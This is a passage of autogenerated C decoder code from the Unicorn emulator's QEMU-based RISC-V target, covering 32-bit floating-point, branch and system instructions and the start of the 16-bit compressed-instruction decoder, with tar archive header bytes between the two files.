&u.f_decode_insn3212)) return true; return false; } return false; case 0x50: /* 1010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:177 */ if (trans_fle_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:176 */ if (trans_flt_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:175 */ if (trans_feq_s(ctx, &u.f_r)) return true; return false; } return false; case 0x51: /* 1010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:204 */ if (trans_fle_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:203 */ if (trans_flt_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:202 */ if (trans_feq_d(ctx, &u.f_r)) return true; return false; } return false; case 0x60: /* 1100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:172 */ if (trans_fcvt_w_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:173 */ if (trans_fcvt_wu_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x61: /* 1100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:206 */ if (trans_fcvt_w_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:207 */ if (trans_fcvt_wu_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x68: /* 1101000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:179 */ if (trans_fcvt_s_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:180 */ if (trans_fcvt_s_wu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x69: /* 1101001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:208 */ if (trans_fcvt_d_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:209 */ if (trans_fcvt_d_wu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x70: /* 1110000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:174 */ if (trans_fmv_x_w(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100000 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:178 */ if (trans_fclass_s(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x71: /* 1110001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00001000: /* 11100010 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:205 */ if (trans_fclass_d(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x78: /* 1111000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:181 */ if (trans_fmv_w_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; } return false; case 0x00000063: /* ........ ........ ........ .1100011 */ decode_insn32_extract_b(ctx, &u.f_b, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:90 */ if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x1: /* ........ ........ .001.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:91 */ if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x4: /* ........ ........ .100.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:92 */ if (trans_blt(ctx, &u.f_b)) return true; return false; case 0x5: /* ........ ........ .101.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:93 */ if (trans_bge(ctx, &u.f_b)) return true; return false; case 0x6: /* ........ ........ .110.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:94 */ if (trans_bltu(ctx, &u.f_b)) return true; return false; case 0x7: /* ........ ........ .111.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:95 */ if (trans_bgeu(ctx, &u.f_b)) return true; return false; } return false; case 0x00000067: /* ........ ........ ........ .1100111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:89 */ if (trans_jalr(ctx, &u.f_i)) return true; return false; } return false; case 0x0000006f: /* ........ ........ ........ .1101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:88 */ decode_insn32_extract_j(ctx, &u.f_j, insn); if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00000073: /* ........ ........ ........ .1110011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1110011 */ switch (insn & 0xfe000f80) { case 0x00000000: /* 0000000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x0: /* 00000000 00000000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:74 */ if (trans_ecall(ctx, &u.f_empty)) return true; return false; case 0x20: /* 00000000 00010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:75 */ if (trans_ebreak(ctx, &u.f_empty)) return true; return false; case 0x40: /* 00000000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:76 */ if (trans_uret(ctx, &u.f_empty)) return true; return false; } return false; case 0x10000000: /* 0001000. ........ .0000000 01110011 */ switch ((insn >> 20) & 0x1f) { case 0x2: /* 00010000 0010.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:77 */ if (trans_sret(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* 00010000 0100.... .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:83 */ decode_insn32_extract_sfence_vm(ctx, &u.f_decode_insn3215, insn); if (trans_sfence_vm(ctx, &u.f_decode_insn3215)) return true; return false; case 0x5: /* 00010000 0101.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 01010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:79 */ if (trans_wfi(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x12000000: /* 0001001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:82 */ decode_insn32_extract_sfence_vma(ctx, &u.f_decode_insn3214, insn); if (trans_sfence_vma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x22000000: /* 0010001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:81 */ decode_insn32_extract_hfence_bvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_bvma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x30000000: /* 0011000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x40: /* 00110000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:78 */ if (trans_mret(ctx, &u.f_empty)) return true; return false; } return false; case 0x62000000: /* 0110001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:80 */ decode_insn32_extract_hfence_gvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_gvma(ctx, &u.f_decode_insn3214)) return true; return false; } return false; case 0x1: /* ........ ........ .001.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:125 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrw(ctx, &u.f_decode_insn329)) return true; return false; case 0x2: /* ........ ........ .010.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:126 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrs(ctx, &u.f_decode_insn329)) return true; return false; case 0x3: /* ........ ........ .011.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:127 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrc(ctx, &u.f_decode_insn329)) return true; return false; case 0x5: /* ........ ........ .101.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:128 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrwi(ctx, &u.f_decode_insn329)) return true; return false; case 0x6: /* ........ ........ .110.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:129 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrsi(ctx, &u.f_decode_insn329)) return true; return false; case 0x7: /* ........ ........ .111.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:130 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrci(ctx, &u.f_decode_insn329)) return true; return false; } return false; } return false; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/riscv64/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020067�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/riscv64/decode_insn16.inc.c�����������������������������������������0000664�0000000�0000000�00000051667�14675241067�0023443�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_empty arg_illegal; static bool trans_illegal(DisasContext *ctx, arg_illegal *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_i arg_ld; static bool trans_ld(DisasContext *ctx, arg_ld *a); typedef arg_s arg_sd; static bool trans_sd(DisasContext *ctx, arg_sd *a); typedef arg_i arg_addiw; static bool trans_addiw(DisasContext *ctx, arg_addiw *a); typedef arg_r arg_subw; static bool trans_subw(DisasContext *ctx, arg_subw *a); typedef arg_r arg_addw; static bool trans_addw(DisasContext *ctx, arg_addw *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void decode_insn16_extract_c_addi16sp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_4(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 2, 1)), 2, 30, extract32(insn, 5, 1)), 3, 29, extract32(insn, 3, 2)), 5, 27, sextract32(insn, 12, 1))); a->rs1 = 2; a->rd = 2; } static void decode_insn16_extract_c_addi4spn(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 5, 1)), 2, 30, extract32(insn, 11, 2)), 4, 28, extract32(insn, 7, 4))); a->rs1 = 2; a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_c_andi(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_c_jalr(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 7, 5); } static void decode_insn16_extract_c_ldsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 12, 1)), 3, 29, extract32(insn, 2, 3))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_li(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = 0; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lui(DisasContext *ctx, arg_u *a, uint16_t insn) { a->imm = ex_shift_12(ctx, deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lwsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 4, 3), 3, 29, extract32(insn, 12, 1)), 4, 28, extract32(insn, 2, 2))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_mv(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 2, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_sdsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 7, 3))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_c_shift(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_shift2(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = extract32(insn, 7, 5); a->rs1 = extract32(insn, 7, 5); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_swsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(extract32(insn, 9, 4), 4, 28, extract32(insn, 7, 2))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_cb_z(DisasContext *ctx, arg_b *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 2), 2, 30, extract32(insn, 10, 2)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 5, 2)), 7, 25, sextract32(insn, 12, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = 0; } static void decode_insn16_extract_ci(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cj(DisasContext *ctx, arg_j *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 3), 3, 29, extract32(insn, 11, 1)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 7, 1)), 6, 26, extract32(insn, 6, 1)), 7, 25, extract32(insn, 9, 2)), 9, 23, extract32(insn, 8, 1)), 10, 22, sextract32(insn, 12, 1))); } static void decode_insn16_extract_cl_d(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cl_w(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = extract32(insn, 2, 5); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cs_2(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_cs_d(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cs_w(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_decode_insn16_Fmt_22(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static bool decode_insn16(DisasContext *ctx, uint16_t insn) { union { arg_b f_b; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000e003) { case 0x00000000: /* 000..... ......00 */ if ((insn & 0x00001fe0) == 0x00000000) { /* 00000000 000...00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:87 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); ctx->invalid = true; if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:88 */ decode_insn16_extract_c_addi4spn(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000001: /* 000..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:96 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000002: /* 000..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:115 */ decode_insn16_extract_c_shift2(ctx, &u.f_shift, insn); if (trans_slli(ctx, &u.f_shift)) return true; return false; case 0x00002000: /* 001..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:90 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00002001: /* 001..... ......01 */ if ((insn & 0x00000f80) == 0x00000000) { /* 001.0000 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:25 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:26 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addiw(ctx, &u.f_i)) return true; return false; case 0x00002002: /* 001..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:116 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 010..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:91 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00004001: /* 010..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:97 */ decode_insn16_extract_c_li(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00004002: /* 010..... ......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 010.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:118 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:119 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00006000: /* 011..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:20 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x00006001: /* 011..... ......01 */ if ((insn & 0x0000107c) == 0x00000000) { /* 0110.... .0000001 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:99 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f80) == 0x00000100) { /* 011.0001 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:100 */ decode_insn16_extract_c_addi16sp(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:101 */ decode_insn16_extract_c_lui(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00006002: /* 011..... ......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 011.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:33 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:34 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x00008001: /* 100..... ......01 */ switch ((insn >> 10) & 0x3) { case 0x0: /* 100.00.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:103 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 100.01.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:104 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srai(ctx, &u.f_shift)) return true; return false; case 0x2: /* 100.10.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:105 */ decode_insn16_extract_c_andi(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; case 0x3: /* 100.11.. ......01 */ decode_insn16_extract_cs_2(ctx, &u.f_r, insn); switch (insn & 0x00001060) { case 0x00000000: /* 100011.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:106 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x00000020: /* 100011.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:107 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00000040: /* 100011.. .10...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:108 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00000060: /* 100011.. .11...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:109 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 100111.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:28 */ if (trans_subw(ctx, &u.f_r)) return true; return false; case 0x00001020: /* 100111.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:29 */ if (trans_addw(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x00008002: /* 100..... ......10 */ switch ((insn >> 12) & 0x1) { case 0x0: /* 1000.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10000000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:122 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1000.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:123 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 0; if (trans_jalr(ctx, &u.f_i)) return true; } /* 